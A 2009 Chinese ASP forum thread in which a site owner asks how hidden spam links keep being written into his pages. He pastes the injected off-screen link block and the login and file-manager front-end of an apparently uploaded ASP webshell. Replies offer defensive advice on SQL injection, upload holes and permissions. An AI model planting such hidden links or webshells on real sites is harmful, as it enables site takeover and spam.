我的网站老是被写入一些代码,怎么办呢?

itzhiren 2009-11-26 09:34:10
网站老是被写入类似以下的一些代码,有的不影响显示,有的影响。它是怎么写入的呢?到底都该做哪些防范措施呢?


<div style="position: absolute; top: -999px;left: -999px;">友情连接: <a href="http://www.wg996.com">露娜私服</a> <a href="http://www.024my.com">机战私服</a> <a href="http://www.ucjx.com">风云私服</a> <a href="http://www.haojianwu.com">机战私服</a> <a href="http://www.40000000.com">热血江湖私服</a> <a href="http://www.haozhuoyue.com">飞天风云</a> <a href="http://www.haojianling.com">剑灵</a> <a href="http://www.madongmin.net">传奇3私服</a> <a href="http://www.485905.com">数字网络</a> <a href="http://www.djxiaolei.com">DJ小磊</a> <a href="http://www.liaosf.com">dnf私服</a> <a href="http://www.haoxianjian.com">开心网</a> <a href="http://www.haowendao.com">问道私服</a> <a href="http://www.haolxw.com">魔兽世界私服</a> <a href="http://www.52067.com">奇迹私服</a> <a href="http://www.zhaoptw.com">完美世界私服</a> <a href="http://www.haochibi.com">赤壁私服</a> <a href="http://www.zt90.com">决战私服</a> <a href="http://www.6686666.com">快播电影</a> <a href="http://www.haozhengba.com">天空软件</a> <a href="http://zhuxiansifu.zt90.com">诛仙私服</a> <a href="http://www.haoshengui.com">神鬼传奇私服</a> <a href="http://bbs.zhaoptw.com">黑链</a> <a href="http://jz.wg996.com">家族网站</a></div>
...全文
354 20 打赏 收藏 举报
写回复
20 条回复
切换为时间正序
当前发帖距今超过3年,不再开放新的回复
发表回复
chinank 2009-12-20
很简单,如果你的服务器是租用的,说明服务器的安全设置不到位,cmd文件被利用了;可以找提供商。

如果你自己的服务器,建议搜索“服务器安全配置”文档,需要禁用部分权限、文件转移、目录转移等;asp网站的漏洞能利用的地方就这几个。

再有一种可能就是你用了组件上传,解决办法是更新上传组件。

以前我们经常用domain明小子检查自己的网站安全性,你也可以测一测。
  • 打赏
  • 举报
回复
mrshelly 2009-12-19
如果网站是你写的.那么, 你应该有办法.

如果网站是你买的. 那么, 你可以去找写网站的人.

如果网站是你DOWN的.那么, 你可以下线一段时间.
  • 打赏
  • 举报
回复
itzhiren 2009-12-19
sql 注入问题做过了

文件上传也过滤了asp asa aspx等好几种文件类型
  • 打赏
  • 举报
回复
yan11cn 2009-12-19
[Quote=引用 10 楼 rebing 的回复:]
如果是程序漏洞
1. 是SQL注入问题
2. 文件上传问题,像现在一般的HTML编辑器  文件上传都有漏洞
[/Quote]

顶 楼主都做了哪些?
非法字符过滤一定要做
  • 打赏
  • 举报
回复
shenzhenNBA 2009-12-19
网站文件被写入东西,那肯定是中招了,
看起连接估计是想借助别的网站进行宣传而已或者增加连接可以提高SEO的机会
到底被注入了还是已经被种植木马了呢?还是受牵连了呢?建议LZ自己检查代码和杀毒看看
  • 打赏
  • 举报
回复
suxiuhai 2009-12-19
我们网站也是,经常主页被改了~
  • 打赏
  • 举报
回复
itzhiren 2009-12-19

<style id=theStyle>
BODY {
FONT-SIZE: 9pt;
COLOR: #000000;
background-color: #ffffff;
FONT-FAMILY: "Courier New";
scrollbar-face-color:#E4E4F3;
scrollbar-highlight-color:#FFFFFF;
scrollbar-3dlight-color:#E4E4F3;
scrollbar-darkshadow-color:#9C9CD3;
scrollbar-shadow-color:#E4E4F3;
scrollbar-arrow-color:#4444B3;
scrollbar-track-color:#EFEFEF;
}
TABLE {
FONT-SIZE: 9pt;
FONT-FAMILY: "Courier New";
BORDER-COLLAPSE: collapse;
border-width: 1px;
border-top-style: solid;
border-right-style: none;
border-bottom-style: none;
border-left-style: solid;
border-color: #d8d8f0;
}
.tr {
font-family: "Courier New";
font-size: 9pt;
background-color: #e4e4f3;
text-align: center;
}
.td {
height: 24px;
font-size: 9pt;
background-color: #f9f9fd;
font-family: "Courier New";
}
input {
font-family: "Courier New";
BORDER-TOP-WIDTH: 1px;
BORDER-LEFT-WIDTH: 1px;
FONT-SIZE: 12px;
BORDER-BOTTOM-WIDTH: 1px;
BORDER-RIGHT-WIDTH: 1px;
color: #000000;
}
textarea {
font-family: "Courier New";
BORDER-WIDTH: 1px;
FONT-SIZE: 12px;
color: #000000;
}
A:visited {
FONT-SIZE: 9pt;
COLOR: #333333;
FONT-FAMILY: "Courier New";
TEXT-DECORATION: none;
}
A:active {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: "Courier New";
TEXT-DECORATION: none;
}
A:link {
FONT-SIZE: 9pt;
COLOR: #000000;
FONT-FAMILY: "Courier New";
TEXT-DECORATION: none;
}
A:hover {
FONT-SIZE: 9pt;
COLOR: #3366cc;
FONT-FAMILY: "Courier New";
TEXT-DECORATION: none;
}
tr {
font-family: "Courier New";
font-size: 9pt;
line-height: 18px;
}
td {
font-size: 9pt;
font-family: "Courier New";
border-width: 1px;
border-top-style: none;
border-right-style: solid;
border-bottom-style: solid;
border-left-style: none;
border-color: #d8d8f0;
}
.trHead {
font-family: "Courier New";
height: 2px;
background-color: #e4e4f3;
line-height: 2px;
}

.fixSpan {
overflow: hidden;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
}

.fixTable {
word-break: break-all;
word-wrap: break-word;
}

#fileList span{
width: 120px;
line-height: 23px;
cursor: hand;
overflow: hidden;
padding-left: 5px;
white-space: nowrap;
text-overflow: ellipsis;
vertical-align: baseline;
border: 1px solid #ffffff;
}
</style>
<script language=javascript>
function locate(str){
var frm = document.forms[1];
frm.theAct.value = str;
frm.TheObj.value = '';
frm.submit();
}

function checkAllBox(obj){
var frm = document.forms[1];
for(var i = 0; i < frm.elements.length; i++)
if(frm.elements[i].id != 'checkAll' && frm.elements[i].type == 'checkbox')
frm.elements[i].checked = obj.checked;
}

function changeThePath(str){
var frm = document.forms[1];
frm.theAct.value = '';
frm.thePath.value = str;
frm.submit();
}

function Command(cmd, str){
var j = 0;
var strTmpB;
var strTmp = str;
var frm = document.forms[1];
strTmpB = frm.PageName.value;

if(cmd == 'pack' || cmd == 'del'){
for(var i = 0; i < frm.elements.length; i++)
if(frm.elements[i].name != 'checkAll' && frm.elements[i].type == 'checkbox' && frm.elements[i].checked)
j ++;
if(j == 0)return;
}

if(cmd == 'rename' || cmd == 'saveas'){
frm.theAct.value = cmd;
frm.param.value = str + ',';
str = prompt('请输入新名称', strTmp);
if(str && (strTmp != str)){
frm.param.value += str;
}else return;
}

if(cmd == 'download'){
frm.theAct.value = 'download';
frm.param.value = str;
if(!confirm('如果该文件超过20M,\n建议不要通过流方式下载\n这样会占用服务器大量的资源\n并可能导致服务器死机!\n您可以先更改文件的后缀名为sys,\n然后通过http协议直接下载.\n按\"确定\"用流来进行下载.'))
return;
}

if(cmd == 'submit'){
frm.theAct.value = '';
}

if(cmd == 'del'){
if(confirm('您确认要删除选中的 ' + j + ' 个文件(夹)吗?')){
frm.theAct.value = 'del';
}else return;
}

if(cmd == 'newone')
if(strTmp = prompt('请输入要新建的文件(夹)名', '')){
frm.theAct.value = 'newone';
frm.param.value = strTmp + ',' + str;
}else return;

if(cmd == 'move' || cmd == 'copy'){
frm.theAct.value = cmd;
}

if(cmd == 'showedit' || cmd == 'showimage'){
frm.theAct.value = cmd;
frm.param.value = str;
frm.target = '_blank';
}

if(cmd == 'Query'){
if(str == '0'){
str = 1;
}else{
frm.reset();
}
frm.theAct.value = cmd;
frm.param.value = str;
}

if(cmd == 'access'){
frm.theAct.value = 'ShowTables';
strTmp = frm.PageName.value;
frm.PageName.value = 'PageDBTool';
frm.thePath.value = frm.truePath.value + '\\' + str;
frm.target = '_blank';
}

if(cmd == 'upload'){
frm.PageName.value = 'PageUpload';
frm.thePath.value = frm.truePath.value;
frm.target = '_blank';
}

if(cmd == 'pack'){
if(confirm('您确认要打包选中的 ' + j + ' 个项目吗?')){
frm.PageName.value = 'PagePack';
frm.theAct.value = 'PackOne';
frm.target = '_blank';
}else return;
}

frm.submit();
frm.target = '';
frm.PageName.value = strTmpB;
frm.reset();
}

function showSqlEdit(column, str){
var frm = document.forms[1];
if(!str)return;
frm.reset();
frm.theAct.value = 'edit';
frm.param.value = column + '!' + str;
frm.target = '_blank';
frm.submit();
frm.target = '';
}

function sqlDelete(column, str){
var frm = document.forms[1];
if(!str)return;
if(!confirm('确认要删除这条记录?'))return;
frm.reset();
frm.theAct.value = 'del';
frm.param.value = column + '!' + str;
frm.target = '_blank';
frm.submit();
frm.target = '';
}
function preView(n){
var url, win;
if(n != '1'){
url = document.forms[1].truePath.value
window.open('/' + escape(url));
}else{
win = window.open("about:blank", "", "resizable=yes,scrollbars=yes");
win.document.write('<style>body{border:none;}</style>' + document.forms[1].fileContent.innerText);
}
}
</script>
<title>管理登录 - 程序网络工作组ASP站点管理员 V1.02</title><meta http-equiv='Content-Type' content='text/html; charset=gb2312'><body onload=document.formx.password.focus();><table width=416 align=center><form method=post name=formx action="/bendilujing/inc.asp"><input type=hidden name=theAct value=Login><tr><td align=center class=td>管理登录</td></tr><tr><td class=trHead> </td></tr><tr><td height=75 align=center><input name=password type=password style='border:1px solid #d8d8f0;background-color:#ffffff;'> <input type=submit value=LOGIN style='border:1px solid #d8d8f0;background-color:#f9f9fd;'></td></tr><tr> <td align=center class=td>程序网络工作组ASP站点管理员 V1.02</td></tr></form></table></body>
  • 打赏
  • 举报
回复
itzhiren 2009-12-19
难道是利用上传漏洞?怎么查找上传漏洞在哪里?
  • 打赏
  • 举报
回复
itzhiren 2009-12-19
找到原因了,服务器被上传了一个.asp文件,可能是通过这个文件来改写的。
我想知道他是怎么上传到服务器的呢?
  • 打赏
  • 举报
回复
rebing 2009-11-26
如果是程序漏洞
1. 是SQL注入问题
2. 文件上传问题,像现在一般的HTML编辑器 文件上传都有漏洞
  • 打赏
  • 举报
回复
lzp4881 2009-11-26
1、程序可能有漏洞
2、系统可能有漏洞
3、两个可能都有漏洞
  • 打赏
  • 举报
回复
黑心 2009-11-26
祝楼主平安。JF
  • 打赏
  • 举报
回复
junshanhudazhaxi 2009-11-26
查找系统漏洞
把程序文件都修改成只读的
在服务器上注意设置上传目录的权限
  • 打赏
  • 举报
回复
caoshangfei 2009-11-26
一般情况是存在上传漏洞,或者sql注入漏洞。被人家上传了木马。如果上传了木马,就可以任意修改你的网站了。
仔细检查检查代码吧。如果是自己的服务器,可以用麦咖啡做一些策略,譬如禁止修改页面文件等等。
  • 打赏
  • 举报
回复
wlcsdf 2009-11-26
加密。用encode加密工具。
  • 打赏
  • 举报
回复
lee80705041 2009-11-26
同上!!!
  • 打赏
  • 举报
回复
dean8828 2009-11-26
代码没写好,加防SQL注入代码吧
  • 打赏
  • 举报
回复
lbcleo 2009-11-26
先说明你都采取那些措施了,才好帮你继续想吧!
  • 打赏
  • 举报
回复
wang1618 2009-11-26
关注
  • 打赏
  • 举报
回复
相关推荐
发帖
ASP
加入

2.8w+

社区成员

ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
  • ASP
  • 无·法
申请成为版主
帖子事件
创建了帖子
2009-11-26 09:34
社区公告
暂无公告